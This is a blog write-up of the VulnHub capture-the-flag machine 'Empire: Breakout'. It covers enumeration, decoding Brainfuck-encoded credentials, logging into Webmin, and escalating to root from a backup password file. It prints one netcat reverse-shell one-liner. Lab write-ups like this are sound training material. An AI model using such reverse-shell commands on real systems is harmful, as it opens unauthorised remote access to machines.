top of page
Image by Blake Cheek
  • Writer's pictureBeri Contraster

Empire: Breakout writeup

Name: "Empire: Breakout"

Date release: 21 Oct 2021

Series: Empire

Difficulty: Easy

Welcome Reader. Today we'll pwn Empire: Breakout from vulnhub. Let's start with an Nmap scan.


Didn't find anything interesting on the web. Let's run enum4linux.

I found a username 'cyber'. Looking through the source page I found an encrypted text of brainfuck algorithm.

don't worry no one will get here, it's safe to share with you my access. Its encrypted :)


This can be decrypted using this. After getting the clear text credentials I logged into the webmin admin panel on port 20000.


After logging into the webmin as cyber I used the terminal to get a reverse shell and upgraded it—Shell upgrade.

Shell: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 4444 >/tmp/f


I found tar in the home directory of cyber which got my attention.

I tried reading .old_pass.bak which I found during enumeration. This file had a password in it.

I tried this password for root and it worked.

Thanks for reading if you have any questions please don't hesitate to ask.

15 views2 comments

Recent Posts

See All


Beri Contraster
Beri Contraster
Mar 11

Dummy Comment

Beri Contraster
Beri Contraster
Mar 11
Replying to

bottom of page